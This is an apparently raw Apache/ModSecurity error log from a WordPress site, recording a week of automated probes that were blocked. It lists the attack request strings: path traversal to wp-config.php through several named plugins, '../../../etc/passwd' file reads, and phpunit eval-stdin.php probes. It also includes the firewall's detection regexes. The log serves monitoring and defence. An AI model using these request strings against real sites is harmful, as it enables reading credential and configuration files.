"YymTb8X-ugRqQFe3YSudJAAAAM8"] [Tue Sep 20 09:41:12.713475 2022] [ssl:warn] [pid 18272:tid 140544579585920] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Sep 20 10:06:38.561259 2022] [autoindex:error] [pid 18005:tid 140544223184640] [client 20.108.189.137:34368] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Tue Sep 20 10:28:12.923333 2022] [ssl:warn] [pid 18272:tid 140544579585920] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Sep 20 14:00:42.495833 2022] [:error] [pid 32216:tid 140544398984960] [client 5.188.62.21:40312] [client 5.188.62.21] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "YyoN2vQC45erEhUnUvZOHQAAAMA"] [Tue Sep 20 14:02:03.884115 2022] [:error] [pid 32374:tid 140544139257600] [client 193.202.82.72:40492] [client 193.202.82.72] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "YyoOK-JBxPH-nnwU1f1WAAAAARY"] [Tue Sep 20 20:05:34.726488 2022] [:error] [pid 32374:tid 140544273540864] [client 89.187.162.178:42826] [client 89.187.162.178] ModSecurity: Access denied with code 403 (phase 2). String match within "/Proxy-Connection/ /Lock-Token/ /Content-Range/ /Translate/ /via/ /if/" at TX:header_name. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "100"] [id "960038"] [rev "2"] [msg "HTTP header is restricted by policy"] [data "/Proxy-Connection/"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/HEADER_RESTRICTED"] [tag "OWASP_CRS/POLICY/FILES_NOT_ALLOWED"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/12.1"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/favicon.ico"] [unique_id "YypjXuJBxPH-nnwU1f2EmwAAAQY"], referer: http://investigacionperu.com/proyectos/documentos/pptmetodo.pdf [Wed Sep 21 00:16:27.258123 2022] [autoindex:error] [pid 32215:tid 140544172828416] [client 20.224.164.61:35220] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Sep 21 03:37:16.925389 2022] [ssl:warn] [pid 7138:tid 139640155883392] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Sep 21 03:37:17.050549 2022] [ssl:warn] [pid 7139:tid 139640155883392] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Sep 21 03:37:17.404965 2022] [ssl:warn] [pid 7139:tid 139640155883392] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Sep 21 03:37:19.396710 2022] [ssl:warn] [pid 7139:tid 139640155883392] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Sep 21 03:37:21.677105 2022] [ssl:warn] [pid 7565:tid 140231717001088] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Sep 21 03:37:21.786884 2022] [ssl:warn] [pid 7566:tid 140231717001088] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Sep 21 13:56:06.098152 2022] [autoindex:error] [pid 8208:tid 140231395231488] [client 57.128.45.42:59504] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Sep 21 14:25:31.824100 2022] [:error] [pid 7585:tid 140231403624192] [client 167.86.115.134:60136] [client 167.86.115.134] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:local-destination-id. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:local-destination-id: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-post.php"] [unique_id "YytlKzpSdkHLdf5zIGQ79gAAAIc"] [Wed Sep 21 16:04:51.923768 2022] [:error] [pid 8208:tid 140231378446080] [client 157.245.140.11:34960] [client 157.245.140.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/localize-my-post/ajax/include.php"] [unique_id "Yyt8c_R4hiq1Mu8C6r0RxgAAAMo"] [Wed Sep 21 16:10:33.506295 2022] [:error] [pid 7583:tid 140231311304448] [client 5.188.62.26:35094] [client 5.188.62.26] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Yyt9yf8l-Tv9S85tCM_bDgAAABI"] [Wed Sep 21 16:12:02.362088 2022] [:error] [pid 8208:tid 140231294519040] [client 182.253.211.42:35150] [client 182.253.211.42] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Yyt-IvR4hiq1Mu8C6r0R0gAAANQ"] [Wed Sep 21 20:15:02.440592 2022] [:error] [pid 7585:tid 140231386838784] [client 5.188.62.140:41088] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Yyu3FjpSdkHLdf5zIGQ9mAAAAIk"] [Wed Sep 21 20:15:49.798627 2022] [:error] [pid 7585:tid 140231378446080] [client 45.10.167.227:41102] [client 45.10.167.227] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Yyu3RTpSdkHLdf5zIGQ9ngAAAIo"] [Thu Sep 22 01:33:26.180225 2022] [:error] [pid 8208:tid 140231395231488] [client 167.86.115.134:52896] [client 167.86.115.134] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/membership-simplified-for-oap-members-only/download.php?download_file=../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/membership-simplified-for-oap-members-only/download.php"] [unique_id "YywBtvR4hiq1Mu8C6r0bfgAAAMg"] [Thu Sep 22 03:32:17.170125 2022] [ssl:warn] [pid 27105:tid 140616767571840] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 22 03:32:17.306839 2022] [ssl:warn] [pid 27106:tid 140616767571840] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 22 03:32:17.681679 2022] [ssl:warn] [pid 27106:tid 140616767571840] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 22 03:32:19.498587 2022] [ssl:warn] [pid 27106:tid 140616767571840] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 22 03:32:21.762932 2022] [ssl:warn] [pid 27528:tid 140102171522944] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 22 03:32:21.894257 2022] [ssl:warn] [pid 27529:tid 140102171522944] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 22 13:03:12.482898 2022] [:error] [pid 28149:tid 140101715662592] [client 54.156.145.91:59486] [client 54.156.145.91] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "19"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "YyyjYNmVz1ZedyHHOcVq4AAAANg"] [Thu Sep 22 14:37:41.647883 2022] [:error] [pid 28149:tid 140101900302080] [client 195.178.120.89:33348] [client 195.178.120.89] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:local-download. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:local-download: ../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-post.php"] [unique_id "Yyy5hdmVz1ZedyHHOcVrwAAAAMI"], referer: www.google.com [Fri Sep 23 03:13:15.916962 2022] [ssl:warn] [pid 15079:tid 140086699370368] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 23 03:13:16.032468 2022] [ssl:warn] [pid 15080:tid 140086699370368] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 23 03:13:16.516993 2022] [ssl:warn] [pid 15080:tid 140086699370368] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 23 03:13:18.371585 2022] [ssl:warn] [pid 15080:tid 140086699370368] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 23 03:13:20.615731 2022] [ssl:warn] [pid 15503:tid 140084947711872] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 23 03:13:20.724863 2022] [ssl:warn] [pid 15504:tid 140084947711872] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 23 06:04:03.326850 2022] [:error] [pid 15523:tid 140084758718208] [client 5.188.62.174:57902] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Yy2So_FIm6wSGB8Pjp8EwwAAAIE"] [Fri Sep 23 06:23:29.054245 2022] [autoindex:error] [pid 16187:tid 140084502255360] [client 20.204.108.156:58210] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Sep 23 12:33:28.139078 2022] [:error] [pid 16187:tid 140084644931328] [client 139.59.5.80:51162] [client 139.59.5.80] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/justified-image-grid/download.php?file=../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/justified-image-grid/download.php"] [unique_id "Yy3t6L9QbjaEXDlDWkuvcgAAAMY"] [Fri Sep 23 16:52:27.990478 2022] [ssl:warn] [pid 18696:tid 139712694302592] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 23 16:52:28.116720 2022] [ssl:warn] [pid 18697:tid 139712694302592] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 23 17:24:49.658189 2022] [ssl:warn] [pid 26067:tid 140149193725824] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 23 17:24:49.776172 2022] [ssl:warn] [pid 26070:tid 140149193725824] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 23 17:26:22.812025 2022] [ssl:warn] [pid 26584:tid 140440225126272] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 23 17:26:22.941938 2022] [ssl:warn] [pid 26585:tid 140440225126272] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 23 17:27:41.805615 2022] [ssl:warn] [pid 27059:tid 140044269193088] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 23 17:27:41.919254 2022] [ssl:warn] [pid 27060:tid 140044269193088] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 24 01:48:34.001634 2022] [:error] [pid 27063:tid 140043926603520] [client 188.166.215.92:39738] [client 188.166.215.92] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/annonces/includes/lib/photo/uploadPhoto.php?abspath=../../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/annonces/includes/lib/photo/uploadPhoto.php"] [unique_id "Yy6oQgoTZPqcDgQClTvjuQAAAIs"] [Sat Sep 24 03:39:18.728677 2022] [ssl:warn] [pid 24730:tid 140669267662720] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 24 03:39:18.866159 2022] [ssl:warn] [pid 24731:tid 140669267662720] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 24 03:39:19.388539 2022] [ssl:warn] [pid 24731:tid 140669267662720] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 24 03:39:21.594420 2022] [ssl:warn] [pid 24731:tid 140669267662720] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 24 03:39:23.985677 2022] [ssl:warn] [pid 25184:tid 140408328079232] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 24 03:39:24.115954 2022] [ssl:warn] [pid 25185:tid 140408328079232] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 25 01:36:01.821062 2022] [:error] [pid 25202:tid 140408000583424] [client 41.216.188.218:48832] [client 41.216.188.218] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:local-download. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:local-download: ../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-post.php"] [unique_id "Yy_20c0roBAgOsCVyLu4XQAAAAk"], referer: www.google.com [Sun Sep 25 03:27:19.670778 2022] [ssl:warn] [pid 16806:tid 139834789537664] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 25 03:27:19.828823 2022] [ssl:warn] [pid 16807:tid 139834789537664] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 25 03:27:20.207961 2022] [ssl:warn] [pid 16807:tid 139834789537664] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 25 03:27:22.251062 2022] [ssl:warn] [pid 16807:tid 139834789537664] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 25 03:27:24.461807 2022] [ssl:warn] [pid 17233:tid 140657828824960] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 25 03:27:24.570127 2022] [ssl:warn] [pid 17234:tid 140657828824960] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 25 06:12:24.336580 2022] [:error] [pid 17255:tid 140657460983552] [client 167.235.247.189:52640] [client 167.235.247.189] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "29"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "YzA3mAnY3rDhHbC8BeSduQAAAE4"], referer: anonymousfox.co [Sun Sep 25 10:39:37.470349 2022] [:error] [pid 17256:tid 140657511339776] [client 195.178.120.89:58030] [client 195.178.120.89] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:local-download. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:local-download: ../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-post.php"] [unique_id "YzB2OSK34dyhzCLZl2sCUAAAAIg"], referer: www.google.com [Sun Sep 25 15:15:49.064589 2022] [:error] [pid 17256:tid 140657469376256] [client 41.216.188.218:35152] [client 41.216.188.218] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:local-download. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:local-download: ../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-post.php"] [unique_id "YzC29SK34dyhzCLZl2sD8AAAAI0"], referer: www.google.com [Sun Sep 25 20:50:33.434536 2022] [:error] [pid 17256:tid 140657536517888] [client 41.216.188.218:44400] [client 41.216.188.218] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:local-download. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:local-download: ../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-post.php"] [unique_id "YzEFaSK34dyhzCLZl2sG7wAAAIU"], referer: www.google.com [Sun Sep 25 23:50:04.879704 2022] [autoindex:error] [pid 17255:tid 140657528125184] [client 20.89.107.114:47486] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Mon Sep 26 03:31:22.835170 2022] [ssl:warn] [pid 22006:tid 140636500666240] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Sep 26 03:31:22.954500 2022] 